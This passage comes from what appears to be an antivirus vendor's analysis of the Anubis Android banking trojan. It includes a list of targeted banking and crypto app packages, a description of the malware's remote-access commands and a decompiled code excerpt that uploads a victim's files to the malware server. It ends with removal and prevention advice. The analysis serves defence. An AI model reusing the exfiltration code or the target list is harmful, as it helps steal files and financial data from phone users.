Mobile<\/td>\n<td width=\"60%\">com.vipera.ts.starter.QNB<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">QNB National Day<\/td>\n<td width=\"60%\">com.redrockdigimark<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Garanti Mobile Banking<\/td>\n<td width=\"60%\">com.garanti.cepsubesi<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Garanti CepBank<\/td>\n<td width=\"60%\">com.garanti.cepbank<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">GarantiBank<\/td>\n<td width=\"60%\">com.garantibank.cepsubesiro<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Garanti Cep \u015eifrematik<\/td>\n<td width=\"60%\">biz.mobinex.android.apps.cep_sifrematik<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Garanti FX Trader<\/td>\n<td width=\"60%\">com.garantiyatirim.fx<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Halkbank Mobil<\/td>\n<td width=\"60%\">com.tmobtech.halkbank<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Halkbank \u015eifrebaz Cep<\/td>\n<td width=\"60%\">com.SifrebazCep<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Halkbank Mobile App<\/td>\n<td width=\"60%\">eu.newfrontier.iBanking.mobile.Halk.Retail<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Halk Trade<\/td>\n<td width=\"60%\">tr.com.tradesoft.tradingsystem.gtpmobile.halk<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Halkbank Nerede<\/td>\n<td width=\"60%\">com.DijitalSahne.EnYakinHalkbank<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Ziraat Mobil<\/td>\n<td width=\"60%\">com.ziraat.ziraatmobil<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Ziraat Tablet<\/td>\n<td width=\"60%\">com.ziraat.ziraattablet<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Ziraat Trader<\/td>\n<td width=\"60%\">com.matriksmobile.android.ziraatTrader<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Ziraat Trader HD<\/td>\n<td width=\"60%\">com.matriksdata.ziraatyatirim.pad<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">PayPal Cash App: Send and Request Money Fast<\/td>\n<td width=\"60%\">com.paypal.android.p2pmobile<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">NETELLER \u2013 fast, secure and global money transfers<\/td>\n<td width=\"60%\">com.moneybookers.skrillpayments.neteller<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Skrill \u2013 Fast, secure online payments<\/td>\n<td width=\"60%\">com.moneybookers.skrillpayments<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">ING Bankieren<\/td>\n<td width=\"60%\">com.ing.mobile<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">\u0130\u015fCep<\/td>\n<td width=\"60%\">com.pozitron.iscep<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Vak\u0131fBank Cep \u015eifre<\/td>\n<td width=\"60%\">com.pozitron.vakifbank<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">BtcTurk Bitcoin Borsas\u0131<\/td>\n<td width=\"60%\">com.btcturk<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Albaraka Mobil \u015eube<\/td>\n<td width=\"60%\">com.pozitron.albarakaturk<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Binance \u2013 Cryptocurrency Exchange<\/td>\n<td width=\"60%\">com.binance.dev<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Binance: Cryptocurrency &amp; Bitcoin Exchange<\/td>\n<td width=\"60%\">com.binance.odapplications<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Blockfolio \u2013 Bitcoin and Cryptocurrency Tracker<\/td>\n<td width=\"60%\">com.blockfolio.blockfolio<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Crypto App \u2013 Widgets, Alerts, News, Bitcoin Prices<\/td>\n<td width=\"60%\">com.crypter.cryptocyrrency<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Delta \u2013 Bitcoin &amp; Cryptocurrency Portfolio Tracker<\/td>\n<td width=\"60%\">io.getdelta.android<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">My CryptoCoins Portfolio \u2013 All Coins<\/td>\n<td width=\"60%\">com.edsoftapps.mycoinsvalue<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Coin Profit<\/td>\n<td width=\"60%\">com.coin.profit<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Coin Market-Bitcoin Prices,Currencies,BTC,EUR,ICO<\/td>\n<td width=\"60%\">com.mal.saul.coinmarketcap<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Coin Portfolio for Bitcoin &amp; Altcoin tracker<\/td>\n<td width=\"60%\">com.tnx.apps.coinportfolio<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Coinbase \u2013 Buy Bitcoin &amp; more. Secure Wallet<\/td>\n<td width=\"60%\">com.coinbase.android<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Coinbase Tracker (3rd party)<\/td>\n<td width=\"60%\">com.portfolio.coinbase_tracker<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Bitcoin Wallet<\/td>\n<td width=\"60%\">de.schildbach.wallet<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum<\/td>\n<td width=\"60%\">piuk.blockchain.android<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Blockchain Merchant<\/td>\n<td width=\"60%\">info.blockchain.merchant<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Bitcoin Blockchain Explorer<\/td>\n<td width=\"60%\">com.jackpf.blockchainsearch<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Unocoin Wallet<\/td>\n<td width=\"60%\">com.unocoin.unocoinwallet<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Unocoin Merchant PoS<\/td>\n<td width=\"60%\">com.unocoin.unocoinmerchantPoS<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">UNOCOIN LIVE<\/td>\n<td width=\"60%\">com.thunkable.android.santoshmehta364.UNOCOIN_LIVE<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Zebpay Calculator \u2013 Profit\/Loss Management<\/td>\n<td width=\"60%\">wos.com.zebpay<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">LocalBitCoins Official<\/td>\n<td width=\"60%\">com.localbitcoinsmbapp<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">LocalBitCoins<\/td>\n<td width=\"60%\">com.thunkable.android.manirana54.LocalBitCoins<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">UNBLOCK Local BitCoins<\/td>\n<td width=\"60%\">com.thunkable.android.manirana54.LocalBitCoins_unblock<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">LocalBitcoins \u2013 Buy and sell Bitcoin<\/td>\n<td width=\"60%\">com.localbitcoins.exchange<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">LocalBitCoins<\/td>\n<td width=\"60%\">com.coins.bit.local<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">LocalBitCoins NEW<\/td>\n<td width=\"60%\">com.coins.ful.bit<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Local BitCoin<\/td>\n<td width=\"60%\">com.jamalabbasii1998.localbitcoin<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Zebpay Bitcoin and Cryptocurrency Exchange<\/td>\n<td width=\"60%\">zebpay.Application<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Zebpay India<\/td>\n<td width=\"60%\">com.bitcoin.ss.zebpayindia<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Jaxx Blockchain Wallet<\/td>\n<td width=\"60%\">com.kryptokit.jaxx<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<ul>\n<li>Remote access Trojan (RAT)<\/li>\n<\/ul>\n<p>This malware has the RAT ability and can allow attackers to issue orders and remote the infected device.<\/p>\n<p>Malware is a separated service named ServiceRAT which has the following goals:<\/p>\n<p><strong>Opendir<\/strong>: send the list of all existence files in the subfolders and directories to the server.<\/p>\n<p><strong>Downloadfile<\/strong>: sending the file to the malware server<\/p>\n<p><strong>Deletefilefolder<\/strong>: removing a specified file or folder in user\u2019s phone<\/p>\n<p><strong>startscreenVNC<\/strong>: sending screenshot from user\u2019s phone to malware server in each 0.5seconds<\/p>\n<p><strong>stopscreenVNC<\/strong>:<\/p>\n<p><strong>startsound<\/strong>: recording audio<\/p>\n<p><strong>noconnection:<\/strong> stoping the related service<\/p>\n<p><code>if (command.contains(\"downloadfile:\")) {<\/code><\/p>\n<p><code>command=command.replace(\"downloadfile:\",\"\").split(\"!!!!\")[0];<\/code><\/p>\n<p><code>this.functions.deletedLoggingFunction(\"file\",command);<\/code><\/p>\n<p><code>try{<\/code><\/p>\n<p><code>this.functions.sendFile(this,command,\"\",\"getfiles[]\");<\/code><\/p>\n<p><code>httpConnector=this.httpConnector;<\/code><\/p>\n<p><code>var4=newStringBuilder();<\/code><\/p>\n<p><code>var4.append(var3);<\/code><\/p>\n<p><code>this.constants.getClass();<\/code><\/p>\n<p><code>var4.append(\"\/o1o\/a2.php\");<\/code><\/p>\n<p><code>Stringvar24=var4.toString();<\/code><\/p>\n<p><code>data=newStringBuilder();<\/code><\/p>\n<p><code>data.append(\"tuk_tuk=\");<\/code><\/p>\n<p><code>Functionsfunctions3=this.functions;<\/code><\/p>\n<p><code>var4=newStringBuilder();<\/code><\/p>\n<p><code>var4.append(this.a);<\/code><\/p>\n<p><code>var4.append(\"|:|!!!refreshfilefolder!!!\");<\/code><\/p>\n<p><code>data.append(functions3.encode(var4.toString()));<\/code><\/p>\n<p><code>httpConnector.doRequest(var24,data.toString());<\/code><\/p>\n<p><code>}catch(Exceptionvar11){<\/code><\/p>\n<p><code>functions2=this.functions;<\/code><\/p>\n<p><code>command=\"error sender\";<\/code><\/p>\n<p><code>break;<\/code><\/p>\n<p><code>}<\/code><\/p>\n<h2>How to deal with it and disinfect the system<\/h2>\n<p>Anubis malware will check all accessibility Events. If a page is opened by the user, due to that the TYPE_WINDOW_STATE_CHANGED event will be sent to the application and at this time will check inside the application code, whether the opened window is related to AAS and application setting. The following terms will be analyzing immediately:<\/p>\n<ol>\n<li style=\"min-height: 1.5em\">Whether Event is related to the opened window due to com.android.settings and or accessibility service.<\/li>\n<li style=\"min-height: 1.5em\">Malware will check a series of specific strings in the event description:\n<ul>\n<li>Uninstall<\/li>\n<li>To remove<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<p>In these two modes, the user will immediately refer to the Home screen and the related application will be closed, i.e. from settings. Since normally it cannot be possible to delete the application, the following solutions for disinfecting infected applications of the phone:<\/p>\n<ul>\n<li>Install another application manager except for application settings that are normally on the phone, so with the help of this service, you can kill the program and then uninstall it.<\/li>\n<li>Boot the system from safe mode, and disable and remove the application from the running application section.<\/li>\n<li>Connect to the phone By using adb tools, and by using the name of the package \u201cminoxvx.ahlpf\u201d and with the order adb uninstall package name remove the application from your phone<\/li>\n<\/ul>\n<p>To make sure that the system is safe, install <a href=\"https:\/\/padvish.com\/en-us\/Main\" target=\"_blank\" rel=\"noopener\">Padvish antivirus<\/a> and keep its database file and scan it.<\/p>\n<p><strong>Methods of preventing phone infection <\/strong><\/p>\n<ol>\n<li style=\"min-height: 1.5em\">Avoid downloading and installing any application from unauthorized resources\/markets.<\/li>\n<li style=\"min-height: 1.5em\">Note the requested permissions, when installing the mobile application.<\/li>\n<li style=\"min-height: 1.5em\">Continuously back up your saved data and files.<\/li>\n<li style=\"min-height: 1.5em\">Do not use an unofficial version of applications. Applications such as Telegram, Instagram have many unofficial versions and most of them release through Telegram channels.<\/li>\n<\/ol>\n","protected":false},"excerpt":{"rendered":"<p>General Explanation Type: Trojan Degree of destruction: average Prevalence: average What is Trojan? Trojans are malware that revealed themselves in the format of an applicable and useful tool. Accordingly, the user downloads and installs them and infects the system without notices that it is malware. Trojans, usually after installation, act as a backdoor so the&hellip;<\/p>\n","protected":false},"author":16,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[24],"class_list":["post-57","post","type-post","status-publish","format-standard","hentry","category-trojan","tag-android"],"_links":{"self":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/57","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/comments?post=57"}],"version-history":[{"count":7,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/57\/revisions"}],"predecessor-version":[{"id":886,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/57\/revisions\/886"}],"wp:attachment":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/media?parent=57"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/categories?post=57"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/tags?post=57"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}